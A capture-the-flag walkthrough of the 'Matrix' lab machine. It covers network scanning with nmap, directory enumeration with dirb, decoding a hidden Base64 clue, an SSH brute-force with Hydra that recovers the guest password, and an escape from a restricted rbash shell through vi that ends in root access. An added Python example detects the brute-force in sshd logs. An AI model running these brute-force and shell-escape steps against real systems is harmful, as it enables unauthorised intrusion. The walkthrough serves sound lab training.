MATRIX

Hello and welcome all. This is a walkthrough of the Matrix machine. Let's roll on and capture the flag.

Summary of the steps

The summary of the steps involved in solving this CTF is given below.

   1. Identifying the target host by using the Nmap utility
   2. Scanning open ports by using the Nmap scanner
   3. Learning more about the target system with HTML comments
   4. Identifying and downloading hidden files
   5. Generating a password list with wordlist
   6. Brute-forcing with Hydra
   7. Logging in and bypassing the Rbash shell
   8. Taking root access
   9. Reading the flag file

Step-1

* First, open a terminal and run the "ifconfig" command. Copy the IP and move on to the next step.



Step-2

* Switch to the root user by running the "sudo su" command.

* Take the IP and scan the network with Nmap; run:

  ⇒ nmap -sn IP.0/24

* For an aggressive scan, run:

 ⇒ nmap -A -v IP

Step-3

* Copy that IP and open it in your browser. When the page opens, right click ➡ view page source.



We can't find any clues in the HTML comments, so copy the URL from the address bar (e.g. https://192.168.29.121/), then come back to the terminal and run:

 ⇒ dirb IP  (e.g. https://192.168.29.121/)


From the dirb output, copy https://192.168.29.225/assets (CODE:301|SIZE:0) and open it in your browser; we get a new page.

Among these files, open img/ and then the port31337.png file; here we can see an image of a rabbit.

Open the browser and go to the IP with the port number that we found (e.g. 192.168.29.225:31337/); you will land on a new page.



Here, right click ➡ view page source.
Then scroll down: we find an encoded value (Base64, not actually a hash). Copy it and decode it on any website.




After decoding that value, we get: echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix


To decode it in the terminal instead, run:

 ⇒ echo "hash value" | base64 -d


Step-4

Go to the browser and open:
 ⇒ 192.168.29.225:31337/Cypher.matrix
Download the file, then run these commands:

 ⇒ cd Downloads

 ⇒ ls

 ⇒ cat Cypher.matrix

Now we get some characters in an encrypted form. Go to any website and decrypt that text.


After decrypting, we get a partial password: k1ll0rXX

Step-5

Now we are going to create a wordlist of passwords. After entering the Downloads directory, run:

⇒ ls

⇒ cat wordlist



Step-6

Using Hydra, we are going to run a brute-force attack against SSH; run:

⇒ hydra -l guest -P wordlist 192.168.29.225 ssh


We get the username and password: guest, k1ll0r7n
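
From the defender's side, the Hydra run above appears in the target's sshd log as a burst of failed logins for guest followed by an accepted one. The detection below is an added example, not part of the original walkthrough; the log lines are constructed, and the function name, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines for illustration (not captured from the Matrix VM).
SAMPLE_LOG = """\
Mar 13 10:15:01 matrix sshd[2101]: Failed password for guest from 192.168.29.50 port 40112 ssh2
Mar 13 10:15:03 matrix sshd[2103]: Failed password for guest from 192.168.29.50 port 40114 ssh2
Mar 13 10:15:05 matrix sshd[2105]: Failed password for guest from 192.168.29.50 port 40116 ssh2
Mar 13 10:15:06 matrix sshd[2107]: Failed password for invalid user admin from 192.168.29.77 port 51000 ssh2
Mar 13 10:15:07 matrix sshd[2109]: Failed password for guest from 192.168.29.50 port 40118 ssh2
Mar 13 10:15:09 matrix sshd[2111]: Failed password for guest from 192.168.29.50 port 40120 ssh2
Mar 13 10:15:11 matrix sshd[2113]: Failed password for guest from 192.168.29.50 port 40122 ssh2
Mar 13 10:15:13 matrix sshd[2115]: Accepted password for guest from 192.168.29.50 port 40124 ssh2
Mar 13 10:20:00 matrix sshd[2201]: Failed password for guest from 192.168.29.77 port 51002 ssh2
Mar 13 10:20:08 matrix sshd[2203]: Accepted password for guest from 192.168.29.77 port 51004 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag (ip, user) pairs with >= threshold failed logins inside window."""
    recent = defaultdict(list)  # (ip, user) -> failure times still inside the window
    findings = {}               # (ip, user) -> {"failures": n, "compromised": bool}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year; a fixed one is enough to compute deltas.
        ts = datetime.strptime("2024 " + m["ts"], "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            recent[key] = [t for t in recent[key] if ts - t <= window] + [ts]
            if len(recent[key]) >= threshold:
                hit = findings.setdefault(key, {"failures": 0, "compromised": False})
                hit["failures"] = max(hit["failures"], len(recent[key]))
        elif key in findings:
            # A successful login after a flagged burst: the guessing worked.
            findings[key]["compromised"] = True
    return findings

if __name__ == "__main__":
    for (ip, user), hit in find_bruteforce(SAMPLE_LOG).items():
        print(ip, user, hit)
```
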

Step-7

We log in to the machine using the command:

⇒ ssh guest@192.168.29.225
⇒ password: k1ll0r7n

Step-8

After that, we are going to get root access:

⇒ echo $PATH

⇒ echo /home/guest/prog

⇒ echo /home/guest/prog/*

⇒ vi


⇒ :!/bin/bash

⇒ echo $SHELL

⇒ export SHELL=/bin/bash:$SHELL

⇒ ls

⇒ export PATH=/usr/bin:$PATH

⇒ echo $PATH

⇒ sudo su

⇒ cd /root

Step-9

Reading the flag / capture the flag

⇒ ls
⇒ cat flag.txt



